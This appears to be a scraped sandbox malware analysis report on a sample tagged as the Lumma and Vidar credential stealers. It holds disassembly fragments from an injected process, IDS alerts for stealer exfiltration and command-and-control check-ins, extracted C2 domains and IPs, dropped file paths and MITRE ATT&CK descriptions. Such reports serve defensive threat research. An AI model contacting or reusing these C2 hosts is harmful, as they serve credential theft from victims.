Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_6C1B7C00 SEC_PKCS12DecoderImportBags,PR_SetError,NSS_OptionGet,CERT_DestroyCertificate,SECITEM_ZfreeItem_Util,PR_SetError,SECKEY_DestroyPublicKey,SECITEM_ZfreeItem_Util,PR_SetError,SECKEY_DestroyPublicKey,SECITEM_ZfreeItem_Util,PR_SetError,SECOID_FindOID_Util,SECITEM_ZfreeItem_Util,SECKEY_DestroyPublicKey,SECOID_GetAlgorithmTag_Util,SECITEM_CopyItem_Util,PK11_ImportEncryptedPrivateKeyInfoAndReturnKey,SECITEM_ZfreeItem_Util,SECKEY_DestroyPublicKey,PK11_ImportPublicKey,SECOID_FindOID_Util,	3_2_6C1B7C00
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_6C1BBD30 SEC_PKCS12IsEncryptionAllowed,NSS_GetAlgorithmPolicy,NSS_GetAlgorithmPolicy,NSS_GetAlgorithmPolicy,NSS_GetAlgorithmPolicy,NSS_GetAlgorithmPolicy,NSS_GetAlgorithmPolicy,NSS_GetAlgorithmPolicy,NSS_GetAlgorithmPolicy,NSS_GetAlgorithmPolicy,	3_2_6C1BBD30
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_6C177D60 PK11_ImportEncryptedPrivateKeyInfoAndReturnKey,SECOID_FindOID_Util,SECOID_FindOIDByTag_Util,PK11_PBEKeyGen,PK11_GetPadMechanism,PK11_UnwrapPrivKey,PK11_FreeSymKey,SECITEM_ZfreeItem_Util,PK11_PBEKeyGen,SECITEM_ZfreeItem_Util,PK11_FreeSymKey,PK11_ImportPublicKey,SECKEY_DestroyPublicKey,	3_2_6C177D60

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4x nop then mov eax, dword ptr fs:[00000030h]	3_2_004014AD
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4x nop then mov dword ptr [ebp-04h], eax	3_2_004014AD
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4x nop then mov eax, dword ptr [esi+04h]	10_2_0043F479
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4x nop then mov eax, dword ptr [esp+08h]	10_2_00412653
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4x nop then movzx edx, byte ptr [ecx+eax]	10_2_0040F7B0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4x nop then mov eax, dword ptr [esp+04h]	10_2_0041407F
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4x nop then mov eax, dword ptr [esp+28h]	10_2_0041407F
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4x nop then mov eax, dword ptr [esp+28h]	10_2_00414031
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4x nop then mov ecx, dword ptr [edi+eax]	10_2_0042D150
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4x nop then jmp ecx	10_2_0043F150
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4x nop then mov edi, eax	10_2_00407170
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4x nop then movzx eax, word ptr [esi+ecx]	10_2_00441100
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4x nop then cmp dword ptr [ebx+edx*8], 7E28BDA7h	10_2_0044A1E0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4x nop then cmp word ptr [ebx+eax+02h], 0000h	10_2_0041F193
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4x nop then mov word ptr [esi], ax	10_2_0041F193
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4x nop then cmp byte ptr [edi], 00000000h	10_2_00416361
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4x nop then jmp eax	10_2_00416361
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4x nop then cmp dword ptr [ebx+edx*8], 7E28BDA7h	10_2_0044A360
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4x nop then mov eax, dword ptr [esp]	10_2_0042D3CC
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4x nop then mov eax, dword ptr [esp]	10_2_004473FA
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4x nop then mov eax, dword ptr [ebp-34h]	10_2_00424390
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4x nop then mov eax, dword ptr [ebp-10h]	10_2_004283A5
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4x nop then mov ebx, dword ptr [edi+04h]	10_2_004303B0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4x nop then mov eax, dword ptr [ebp-14h]	10_2_0042F40F
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4x nop then mov eax, dword ptr [esp]	10_2_00443420
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4x nop then cmp dword ptr [ebp+edx*8+00h], 81105F7Ah	10_2_0044A4D0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4x nop then mov eax, ebp	10_2_0040A4E0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4x nop then mov eax, ebp	10_2_0040A4E0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4x nop then mov eax, dword ptr [ebp-18h]	10_2_0042B490
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4x nop then mov eax, dword ptr [esp]	10_2_0044A5E0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4x nop then mov eax, dword ptr [ebp-54h]	10_2_004206E0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4x nop then cmp dword ptr [ebx+edx*8], 1B788DCFh	10_2_00443870
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4x nop then mov eax, dword ptr [esp]	10_2_0043F8C0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4x nop then cmp dword ptr [ebx+edx*8], 77A9E0C4h	10_2_0043F8C0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4x nop then movzx ebx, byte ptr [edx]	10_2_0043A880
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4x nop then mov eax, dword ptr [esp]	10_2_0044A8B0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4x nop then mov eax, dword ptr [esp+04h]	10_2_004468B9
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4x nop then mov eax, dword ptr [esp+08h]	10_2_00412653
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4x nop then cmp word ptr [ebp+edi+02h], 0000h	10_2_00426910
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4x nop then cmp dword ptr [esi+edx*8], 0633C81Dh	10_2_004449F0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4x nop then mov eax, dword ptr [esp+04h]	10_2_0041399C
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4x nop then mov edi, ecx	10_2_0041399C
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4x nop then mov eax, dword ptr [esp]	10_2_004499B0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4x nop then movzx ebp, word ptr [edi]	10_2_0043EA30
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4x nop then cmp byte ptr [edi], 00000000h	10_2_00415ADF
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4x nop then cmp word ptr [ecx+eax+02h], 0000h	10_2_0041DAA0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4x nop then push ebx	10_2_0041DAA0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4x nop then mov eax, dword ptr [esp+10h]	10_2_0040DAB0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4x nop then mov word ptr [eax], cx	10_2_00426B80
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4x nop then cmp dword ptr [esi+edx*8], CECD21FDh	10_2_0042BC50
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4x nop then cmp dword ptr [edi+edx*8], CECD21FDh	10_2_0042BC50
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4x nop then mov word ptr [eax], cx	10_2_00449C10
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4x nop then mov eax, dword ptr [esp+04h]	10_2_00413CC6
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4x nop then mov eax, dword ptr [esp+08h]	10_2_00412653
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4x nop then mov ecx, dword ptr [edi+eax]	10_2_0042CCDD
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4x nop then mov ecx, dword ptr [edi+eax]	10_2_0042CCF5
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4x nop then mov eax, dword ptr [esp]	10_2_00428C90
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4x nop then movzx edx, byte ptr [esi+edi]	10_2_00404CB0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4x nop then mov eax, dword ptr [ebp-14h]	10_2_0042ED6D
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4x nop then mov eax, dword ptr [ebp-14h]	10_2_0042ED6D
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4x nop then movzx edx, byte ptr [esi+ebx]	10_2_00405D10
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4x nop then mov eax, dword ptr [esi+20h]	10_2_00431E00
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4x nop then mov byte ptr [ebx], al	10_2_00431E00
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4x nop then mov byte ptr [ebx], al	10_2_00431E00
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4x nop then mov eax, dword ptr [esi+00000744h]	10_2_00431E00
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4x nop then mov byte ptr [edi], al	10_2_00431E00
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4x nop then mov byte ptr [ebx], al	10_2_00431E00
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4x nop then mov byte ptr [edi], al	10_2_00431E00
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4x nop then mov eax, 0000000Bh	10_2_00431E00
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4x nop then mov byte ptr [edi], al	10_2_00431E00
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4x nop then mov eax, dword ptr [esp]	10_2_00447E30
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4x nop then cmp dword ptr [esi+edx*8], 54CA534Eh	10_2_00447E30
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4x nop then cmp byte ptr [edi], 00000000h	10_2_00415EF6
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4x nop then jmp eax	10_2_00415EF6
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4x nop then mov dword ptr [esp], 00000000h	10_2_0041AF50
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4x nop then mov eax, dword ptr [ebp-10h]	10_2_00410F0F
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4x nop then mov edi, dword ptr [ebp-3Ch]	10_2_0042DFD6
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4x nop then cmp dword ptr [esi+edx*8], 0633C81Dh	10_2_00443FA0

Source: Network traffic	Suricata IDS: 2054495 - Severity 1 - ET MALWARE Vidar Stealer Form Exfil : 192.168.2.4:49770 -> 45.132.206.251:80
Source: Network traffic	Suricata IDS: 2049087 - Severity 1 - ET MALWARE Win32/Stealc/Vidar Stealer Style Headers In HTTP POST : 192.168.2.4:49744 -> 116.203.165.127:443
Source: Network traffic	Suricata IDS: 2051831 - Severity 1 - ET MALWARE Win32/Stealc/Vidar Stealer Active C2 Responding with plugins Config M1 : 116.203.165.127:443 -> 192.168.2.4:49744
Source: Network traffic	Suricata IDS: 2044247 - Severity 1 - ET MALWARE Win32/Stealc/Vidar Stealer Active C2 Responding with plugins Config : 116.203.165.127:443 -> 192.168.2.4:49743
Source: Network traffic	Suricata IDS: 2049836 - Severity 1 - ET MALWARE Lumma Stealer Related Activity : 192.168.2.4:49772 -> 172.67.203.61:443
Source: Network traffic	Suricata IDS: 2049836 - Severity 1 - ET MALWARE Lumma Stealer Related Activity : 192.168.2.4:49769 -> 188.114.96.3:443
Source: Network traffic	Suricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.4:49772 -> 172.67.203.61:443
Source: Network traffic	Suricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.4:49769 -> 188.114.96.3:443
Source: Network traffic	Suricata IDS: 2049836 - Severity 1 - ET MALWARE Lumma Stealer Related Activity : 192.168.2.4:49768 -> 188.114.96.3:443
Source: Network traffic	Suricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.4:49768 -> 188.114.96.3:443
Source: Network traffic	Suricata IDS: 2049812 - Severity 1 - ET MALWARE Lumma Stealer Related Activity M2 : 192.168.2.4:49775 -> 104.21.16.38:443
Source: Network traffic	Suricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.4:49775 -> 104.21.16.38:443
Source: Network traffic	Suricata IDS: 2049836 - Severity 1 - ET MALWARE Lumma Stealer Related Activity : 192.168.2.4:49774 -> 104.21.16.38:443
Source: Network traffic	Suricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.4:49774 -> 104.21.16.38:443
Source: Network traffic	Suricata IDS: 2049836 - Severity 1 - ET MALWARE Lumma Stealer Related Activity : 192.168.2.4:49766 -> 104.21.9.6:443
Source: Network traffic	Suricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.4:49766 -> 104.21.9.6:443
Source: Network traffic	Suricata IDS: 2049836 - Severity 1 - ET MALWARE Lumma Stealer Related Activity : 192.168.2.4:49773 -> 104.21.9.6:443
Source: Network traffic	Suricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.4:49773 -> 104.21.9.6:443

Source: Malware configuration extractor	URLs: surveriysiop.shop
Source: Malware configuration extractor	URLs: captainynfanw.shop
Source: Malware configuration extractor	URLs: coursedonnyre.shop
Source: Malware configuration extractor	URLs: appleboltelwk.shop
Source: Malware configuration extractor	URLs: tearrybyiwo.shop
Source: Malware configuration extractor	URLs: fossillargeiw.shop
Source: Malware configuration extractor	URLs: tendencerangej.shop
Source: Malware configuration extractor	URLs: strappystyio.shop
Source: Malware configuration extractor	URLs: https://steamcommunity.com/profiles/76561199780418869

Description:	Adversaries may abuse Windows Management Instrumentation (WMI) to execute malicious commands and payloads. WMI is an administration feature that provides a uniform environment to access Windows system components. The WMI service enables both local and remote access, though the latter is facilitated by Remote Services such as Distributed Component Object Model (DCOM) and Windows Remote Management (WinRM).Remote WMI over DCOM operates using port 135, whereas WMI over WinRM operates over port 5985 when using HTTP and 5986 for HTTPS.
Tactics:	Execution
Data Sources:	Command: Command Execution, Network Traffic: Network Connection Creation, Process: Process Creation, WMI: WMI Creation
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may interact with the native OS application programming interface (API) to execute behaviors. Native APIs provide a controlled means of calling low-level OS services within the kernel, such as those involving hardware/devices, memory, and processes.These native APIs are leveraged by the OS during system boot (when other system components are not yet initialized) as well as carrying out tasks and requests during routine operations.
Tactics:	Execution
Data Sources:	Module: Module Load, Process: OS API Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may abuse PowerShell commands and scripts for execution. PowerShell is a powerful interactive command-line interface and scripting environment included in the Windows operating system.Adversaries can use PowerShell to perform a number of actions, including discovery of information and execution of code. Examples include the `Start-Process` cmdlet which can be used to run an executable and the `Invoke-Command` cmdlet which runs a command locally or on a remote computer (though administrator permissions are required to use PowerShell to connect to remote systems).
Tactics:	Execution
Data Sources:	Command: Command Execution, Module: Module Load, Process: Process Creation, Process: Process Metadata, Script: Script Execution
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may execute their own malicious payloads by side-loading DLLs. Similar to DLL Search Order Hijacking , side-loading involves hijacking which DLL a program loads. But rather than just planting the DLL within the search order of a program then waiting for the victim application to be invoked, adversaries may directly side-load their payloads by planting then invoking a legitimate application that executes their payload(s).
Tactics:	Defense Evasion, Persistence, Privilege Escalation
Data Sources:	File: File Creation, File: File Modification, Module: Module Load, Process: Process Creation
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may inject code into processes in order to evade process-based defenses as well as possibly elevate privileges. Process injection is a method of executing arbitrary code in the address space of a separate live process. Running code in the context of another process may allow access to the process's memory, system/network resources, and possibly elevated privileges. Execution via process injection may also evade detection from security products since the execution is masked under a legitimate process.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	File: File Metadata, File: File Modification, Module: Module Load, Process: OS API Execution, Process: Process Access, Process: Process Metadata, Process: Process Modification
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may modify and/or disable security tools to avoid possible detection of their malware/tools and activities. This may take many forms, such as killing security software processes or services, modifying / deleting Registry keys or configuration files so that tools do not operate properly, or other methods to interfere with security tools scanning or reporting information. Adversaries may also disable updates to prevent the latest security patches from reaching tools on victim systems.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, Driver: Driver Load, Process: Process Creation, Process: Process Termination, Sensor Health: Host Status, Service: Service Metadata, Windows Registry: Windows Registry Key Deletion, Windows Registry: Windows Registry Key Modification
Platforms:	Containers, IaaS, Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use Obfuscated Files or Information to hide artifacts of an intrusion from analysis. They may require separate mechanisms to decode or deobfuscate that information depending on how they intend to use it. Methods for doing that include built-in functionality of malware or by using utilities present on the system.
Tactics:	Defense Evasion
Data Sources:	File: File Modification, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to make an executable or file difficult to discover or analyze by encrypting, encoding, or otherwise obfuscating its contents on the system or in transit. This is common behavior that can be used across different platforms and the network to evade defenses.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, File: File Creation, File: File Metadata, Module: Module Load, Process: OS API Execution, Process: Process Creation, Script: Script Execution, WMI: WMI Creation, Windows Registry: Windows Registry Key Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may perform software packing or virtual machine software protection to conceal their code. Software packing is a method of compressing or encrypting an executable. Packing an executable changes the file signature in an attempt to avoid signature-based detection. Most decompression techniques decompress the executable code in memory. Virtual machine software protection translates an executable's original code into a special format that only a special virtual machine can run. A virtual machine is then called to run this code.
Tactics:	Defense Evasion
Data Sources:	File: File Metadata
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to manipulate features of their artifacts to make them appear legitimate or benign to users and/or security tools. Masquerading occurs when the name or location of an object, legitimate or malicious, is manipulated or abused for the sake of evading defenses and observation. This may include manipulating file metadata, tricking users into misidentifying the file type, and giving legitimate task or service names.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, File: File Metadata, File: File Modification, Image: Image Metadata, Process: OS API Execution, Process: Process Creation, Process: Process Metadata, Scheduled Job: Scheduled Job Metadata, Scheduled Job: Scheduled Job Modification, Service: Service Creation, Service: Service Metadata
Platforms:	Containers, Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ various means to detect and avoid virtualization and analysis environments. This may include changing behaviors based on the results of checks for the presence of artifacts indicative of a virtual machine environment (VME) or sandbox. If the adversary detects a VME, they may alter their malware to disengage from the victim or conceal the core functions of the implant. They may also search for VME artifacts before dropping secondary or additional payloads. Adversaries may use the information learned from [Virtualization/Sandbox Evasion](https://attack.mitre.org/techniques/T1497) during automated discovery to shape follow-on behaviors.
Tactics:	Defense Evasion, Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to dump credentials to obtain account login and credential material, normally in the form of a hash or a clear text password, from the operating system and software. Credentials can then be used to perform Lateral Movement and access restricted information.
Tactics:	Credential Access
Data Sources:	Active Directory: Active Directory Object Access, Command: Command Execution, File: File Access, Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow, Process: OS API Execution, Process: Process Access, Process: Process Creation, Windows Registry: Windows Registry Key Access
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may search the Registry on compromised systems for insecurely stored credentials. The Windows Registry stores configuration information that can be used by the system or other programs. Adversaries may query the Registry looking for credentials and passwords that have been stored for use by other programs or services. Sometimes these credentials are used for automatic logons.
Tactics:	Credential Access
Data Sources:	Command: Command Execution, Process: Process Creation, Windows Registry: Windows Registry Key Access
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	An adversary may gather the system time and/or time zone from a local or remote system. The system time is set and stored by the Windows Time Service within a domain to maintain time synchronization between systems and services in an enterprise network.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get a listing of valid accounts, usernames, or email addresses on a system or within a compromised environment. This information can help adversaries determine which accounts exist, which can aid in follow-on behavior such as brute-forcing, spear-phishing attacks, or account takeovers (e.g., Valid Accounts ).
Tactics:	Discovery
Data Sources:	Command: Command Execution, File: File Access, Process: Process Creation
Platforms:	Azure AD, Google Workspace, IaaS, Linux, macOS, Office 365, SaaS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may enumerate files and directories or may search in specific locations of a host or network share for certain information within a file system. Adversaries may use the information from File and Directory Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Behavior Section

Behavior Chronological

Disassembly

Uncategorized

Graph

Loading Joe Sandbox Report ...

Warning!

Windows Analysis Report file.exe

Overview

General Information

Detection

Signatures

Classification

Process Tree

Malware Threat Intel

Malware Configuration

Threatname: LummaC

Threatname: Vidar

Yara Signatures

PCAP (Network Traffic)

Memory Dumps

Unpacked PEs

Sigma Signatures

Suricata Signatures

Joe Sandbox Signatures

AV Detection

Cryptography

Compliance

Spreading

Software Vulnerabilities

Networking

Key, Mouse, Clipboard, Microphone and Screen Capturing

System Summary

Data Obfuscation

Persistence and Installation Behavior

Hooking and other Techniques for Hiding and Protection

Malware Analysis System Evasion

Anti Debugging

HIPS / PFW / Operating System Protection Evasion

Language, Device and Operating System Detection

Lowering of HIPS / PFW / Operating System Security Settings

Stealing of Sensitive Information

Remote Access Functionality

Mitre Att&ck Matrix

Behavior Graph

Screenshots

Thumbnails

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Dropped Files

Unpacked PE Files

Domains

URLs

Domains and IPs

Contacted Domains

Contacted URLs

URLs from Memory and Binaries

World Map of Contacted IPs

Public IPs

General Information

Warnings

Simulations

Behavior and APIs

Joe Sandbox View / Context

IPs

Domains

ASNs

JA3 Fingerprints

Dropped Files

Created / dropped Files

C:\ProgramData\BKKKEGIDBG.exe

C:\ProgramData\CAEHCFCBKKJD\BFBAAF

C:\ProgramData\CAEHCFCBKKJD\BFIJKE

C:\ProgramData\CAEHCFCBKKJD\DGDBAK

C:\ProgramData\CAEHCFCBKKJD\DHCAAE

C:\ProgramData\CAEHCFCBKKJD\DHCAAE-shm

C:\ProgramData\CAEHCFCBKKJD\FCAAAA

C:\ProgramData\CAEHCFCBKKJD\HDGDHC

C:\ProgramData\CAEHCFCBKKJD\HJDBKJ

C:\ProgramData\CAEHCFCBKKJD\IDBKKK

Windows Analysis Report
file.exe

Description:	An adversary may attempt to get detailed information about the operating system and hardware, including version, patches, hotfixes, service packs, and architecture. Adversaries may use the information from System Information Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	IaaS, Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get information about running processes on a system. Information obtained could be used to gain an understanding of common software/applications running on systems within the network. Adversaries may use the information from Process Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to identify the primary user, currently logged in user, set of users that commonly uses a system, or whether a user is actively using the system. They may do this, for example, by retrieving account usernames or by using OS Credential Dumping . The information may be collected in a number of different ways using other Discovery techniques, because user and username details are prevalent throughout a system and include running process ownership, file/directory ownership, session information, and system logs. Adversaries may use the information from [System Owner/User Discovery](https://attack.mitre.org/techniques/T1033) during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Active Directory: Active Directory Object Access, Command: Command Execution, File: File Access, Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow, Process: OS API Execution, Process: Process Access, Process: Process Creation, Windows Registry: Windows Registry Key Access
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may compress and/or encrypt data that is collected prior to exfiltration. Compressing the data can help to obfuscate the collected data and minimize the amount of data sent over the network. Encryption can be used to hide information that is being exfiltrated from detection or make exfiltration less conspicuous upon inspection by a defender.
Tactics:	Collection
Data Sources:	Command: Command Execution, File: File Creation, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may search local system sources, such as file systems and configuration files or local databases, to find files of interest and sensitive data prior to Exfiltration.
Tactics:	Collection
Data Sources:	Command: Command Execution, File: File Access, Process: OS API Execution, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to take screen captures of the desktop to gather information over the course of an operation. Screen capturing functionality may be included as a feature of a remote access tool used in post-compromise operations. Taking a screenshot is also typically possible through native utilities or API calls, such as `CopyFromScreen` , `xwd` , or `screencapture` .
Tactics:	Collection
Data Sources:	Command: Command Execution, Process: OS API Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may collect data stored in the clipboard from users copying information within or between applications.
Tactics:	Collection
Data Sources:	Command: Command Execution, Process: OS API Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may transfer tools or other files from an external system into a compromised environment. Tools or files may be copied from an external adversary-controlled system to the victim network through the command and control channel or through alternate protocols such as ftp . Once present, adversaries may also transfer/spread tools between victim devices within a compromised environment (i.e. Lateral Tool Transfer ).
Tactics:	Command and Control
Data Sources:	Command: Command Execution, File: File Creation, Network Traffic: Network Connection Creation, Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

